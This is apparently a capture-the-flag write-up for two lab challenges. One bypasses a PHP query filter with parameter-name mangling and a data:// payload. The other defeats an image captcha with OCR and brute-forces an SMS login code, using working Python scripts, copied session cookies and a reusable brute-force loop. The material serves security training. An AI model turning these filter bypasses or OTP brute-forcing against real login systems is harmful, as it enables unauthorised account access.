1. Scripting level: "Smile" (微笑一下). Challenge URL: http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php
View the source:
include('flag.php');
$smile = 1;
if (!isset ($_GET['^_^'])) $smile = 0;
if (preg_match ('/\./', $_GET['^_^'])) $smile = 0;
if (preg_match ('/%/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/[0-9]/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/http/', $_GET['^_^']) ) $smile = 0;
if (preg_match ('/https/', $_GET['^_^']) ) $smile = 0;
if (preg_match ('/ftp/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/telnet/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/_/', $_SERVER['QUERY_STRING'])) $smile = 0;
if ($smile) {
    if (@file_exists ($_GET['^_^'])) $smile = 0;
}
if ($smile) {
    $smile = @file_get_contents ($_GET['^_^']);
    if ($smile === "(●'◡'●)") die($flag);
}
Obviously the parameter should be ^_^=(●'◡'●), but three things get in the way: the '_' check runs on $_SERVER['QUERY_STRING'], i.e. on the raw query string, so the literal name ^_^ is rejected; the value must not be an existing file (file_exists) yet must still be readable by file_get_contents; and http, https, ftp and telnet are filtered out of the value, as are '.', '%' and digits. PHP rewrites '.' (and spaces) in parameter names to '_' when it builds $_GET, so ^.^ in the raw query string arrives as $_GET['^_^'] while QUERY_STRING still contains the dot. The data:// wrapper is not on the block list and file_exists() returns false for it, so the working parameter is: ?^.^=data://text/plain;charset=unicode,(●'◡'●) Two details: the apostrophes must be the ASCII ' used in the comparison string, not typographic quotes, and the '%' check is applied to the already-decoded $_GET value, so the browser percent-encoding the non-ASCII characters on the wire is fine.
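As an added example (not part of the original writeup), the following Python models the challenge's filter chain so a candidate query string can be checked offline before it is sent. It assumes the server behaves like the PHP above: parameter names are taken from the raw query string with PHP's documented '.'/' ' to '_' name mangling, the value is URL-decoded into $_GET, file_exists() is false for data:// URIs, and PHP's data:// wrapper accepts both "data:" and "data://" and URL-decodes a non-base64 payload (RFC 2397). Anything that is not a data URI is treated as unreadable in this model.

```python
import re
import base64
from urllib.parse import quote, unquote_to_bytes

SMILE = "(●'◡'●)"   # the exact string flag.php compares against (ASCII apostrophes)


def php_parse_query(query: str) -> dict:
    """Approximate how PHP populates $_GET from QUERY_STRING.

    PHP turns '.' and ' ' in a parameter *name* into '_' (assumed to match the
    target; it is documented PHP behaviour), so the name `^.^` becomes the key
    '^_^' while $_SERVER['QUERY_STRING'] still contains the dot.
    """
    get = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        name = unquote_to_bytes(name).decode("utf-8", "replace")
        name = name.replace(".", "_").replace(" ", "_")
        get[name] = unquote_to_bytes(value).decode("utf-8", "replace")
    return get


def read_data_uri(uri: str):
    """Model of PHP's data:// wrapper. Returns the payload bytes, or None if
    `uri` is not a data URI. Assumption: 'data:' and 'data://' are both
    accepted and a non-base64 payload is url-decoded (RFC 2397)."""
    m = re.match(r"data:(?://)?([^,]*),(.*)", uri, re.S)
    if not m:
        return None
    mediatype, payload = m.groups()
    if mediatype.endswith(";base64"):
        return base64.b64decode(payload)
    return unquote_to_bytes(payload)


def passes_filters(query: str) -> bool:
    """Replay the challenge's checks in order; True means die($flag) is reached."""
    get = php_parse_query(query)
    if "^_^" not in get:
        return False
    value = get["^_^"]
    # these checks run on the already url-decoded $_GET value ...
    for pat in (r"\.", r"%", r"[0-9]", r"http", r"https", r"ftp", r"telnet"):
        if re.search(pat, value):
            return False
    # ... but this one runs on the raw query string, so a literal ^_^ name fails here
    if "_" in query:
        return False
    content = read_data_uri(value)
    if content is None:
        # a real path: either file_exists() is true (rejected) or the read fails
        return False
    return content == SMILE.encode("utf-8")


def build_query(value: str = "data://text/plain;charset=unicode," + SMILE) -> str:
    """Raw query string as the browser sends it: name `^.^` (no underscore),
    value percent-encoded, so the smile travels as %E2%97%8F%27... on the wire."""
    return "^.^=" + quote(value)


if __name__ == "__main__":
    q = build_query()
    print(q)
    print("passes filters:", passes_filters(q))
```

The point the model makes explicit is that the checks look at two different views of the request: the '_' check sees the raw QUERY_STRING and the other checks see the decoded $_GET value, and PHP's name mangling sits between them.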
2. Scripting level: recognise the captcha and brute-force the SMS verification code. Challenge URL: http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/index.php#
Before submitting, first click "get verification code"; then look at the request headers after a submission to obtain the cookies and the parameters that are posted.
The captcha can be recognised with tesseract; the code is as follows:
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests          # HTTP requests carrying the session cookies
import sys
import time
from pytesseract import image_to_string
from PIL import Image


def vcode(pic_url, cookies, max_tries=20):
    """Fetch the captcha image and OCR it with tesseract.

    Returns a 4-digit string. Anything else is treated as a misread and a new
    image is fetched (the server serves a fresh captcha on every request, so a
    retry is a new captcha, not the same one re-read). Bounded instead of
    recursive so a bad OCR setup cannot recurse without limit.
    """
    for _ in range(max_tries):
        r = requests.get(pic_url, cookies=cookies, timeout=10)
        with open('vcode.png', 'wb') as pic:
            pic.write(r.content)
        text = image_to_string(Image.open('vcode.png')).replace(' ', '').strip()
        if text.isdigit() and len(text) == 4:
            return text
    raise RuntimeError('captcha OCR failed %d times' % max_tries)


# session cookies copied from the browser after clicking "get verification code"
cookies = {
    'saeut': '14.19.157.117.1435504248010840',
    'PHPSESSID': '2cec394dbfba709823daea4ba71eb04a'}
# form fields observed in the submitted request; mobi_code is the value to brute force,
# user_code is the captcha read by vcode()
payload = {
    'username': '13388886666', 'mobi_code': '100',
    'user_code': '5053', 'Login': 'submit'}
#headers = {'user-agent': 'my-app/0.0.1'}
picurl = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php'
url = "http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php"
#filename = u"D:/User
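The writeup stops before the brute-force loop itself. As an added example (not the original author's code), here is that loop written so the network and OCR steps are injected and it can be exercised offline against a constructed fake of vcode.php/login.php. Assumptions: the SMS code is a 3-digit number (the original payload uses '100' for mobi_code), every submission needs a freshly fetched captcha, and login.php's reply distinguishes a wrong captcha from a wrong SMS code. The response markers ("bad captcha", "key is ...") are placeholders for the fake, not strings observed on the real site.

```python
from dataclasses import dataclass
from typing import Callable, Iterable, Optional


@dataclass
class Result:
    code: Optional[str]      # the accepted SMS code, or None if none matched
    attempts: int            # login.php submissions made
    captcha_retries: int     # submissions rejected because the OCR misread the captcha


def brute_force(candidates: Iterable[str],
                get_captcha: Callable[[], str],
                submit: Callable[[str, str], str],
                is_success: Callable[[str], bool],
                is_bad_captcha: Callable[[str], bool],
                max_captcha_retries: int = 5) -> Result:
    """Try every candidate SMS code, fetching a fresh captcha per submission.

    A 'bad captcha' reply means tesseract misread the image, so the same code is
    retried with a new captcha rather than silently skipped; any other
    non-success reply means the captcha was accepted and the code is wrong.
    """
    attempts = retries = 0
    for code in candidates:
        for _ in range(max_captcha_retries):
            body = submit(code, get_captcha())
            attempts += 1
            if is_success(body):
                return Result(code, attempts, retries)
            if not is_bad_captcha(body):
                break                       # captcha accepted, SMS code wrong
            retries += 1                    # OCR misread: retry this same code
        else:
            raise RuntimeError("captcha never accepted for code %s; "
                               "fix the OCR rather than skipping the candidate" % code)
    return Result(None, attempts, retries)


def live_callables(session, picurl, url, base_payload, ocr):
    """Wire brute_force() to a real target through a requests.Session.

    `ocr` is a function(image_bytes) -> str (e.g. a pytesseract wrapper).
    The success/bad-captcha predicates must be written against strings seen in
    the real login.php response; they are not known from the writeup.
    """
    def get_captcha():
        return ocr(session.get(picurl, timeout=10).content)

    def submit(mobi_code, user_code):
        data = dict(base_payload, mobi_code=mobi_code, user_code=user_code)
        return session.post(url, data=data, timeout=10).text

    return get_captcha, submit


class FakeLogin:
    """Constructed stand-in for vcode.php/login.php so the loop runs offline.

    Issues a new captcha on every fetch, accepts a login only when the submitted
    captcha equals the last one issued AND the SMS code equals `secret`, and
    simulates tesseract misreading every `misread_every`-th image.
    """
    def __init__(self, secret: str = "217", misread_every: int = 4):
        self.secret, self.misread_every = secret, misread_every
        self.issued = 0
        self.current = None

    def fetch_and_ocr(self) -> str:
        self.issued += 1
        self.current = "%04d" % ((self.issued * 7919) % 10000)   # value the server expects
        return "0000" if self.issued % self.misread_every == 0 else self.current

    def submit(self, mobi_code: str, user_code: str) -> str:
        if user_code != self.current:
            return "bad captcha"
        return "key is FLAG{constructed}" if mobi_code == self.secret else "wrong sms code"


def demo(secret: str = "217") -> Result:
    """Run the loop against the fake target over the 3-digit code space 100-999."""
    srv = FakeLogin(secret)
    return brute_force(("%03d" % i for i in range(100, 1000)),
                       srv.fetch_and_ocr, srv.submit,
                       is_success=lambda b: b.startswith("key is"),
                       is_bad_captcha=lambda b: b == "bad captcha")


if __name__ == "__main__":
    print(demo())
```

Separating "captcha rejected" from "code rejected" is what makes the loop reliable: if a misread were counted as a wrong code, the correct value could be passed over and never revisited, and the attempt count would under-report how many requests the target actually saw.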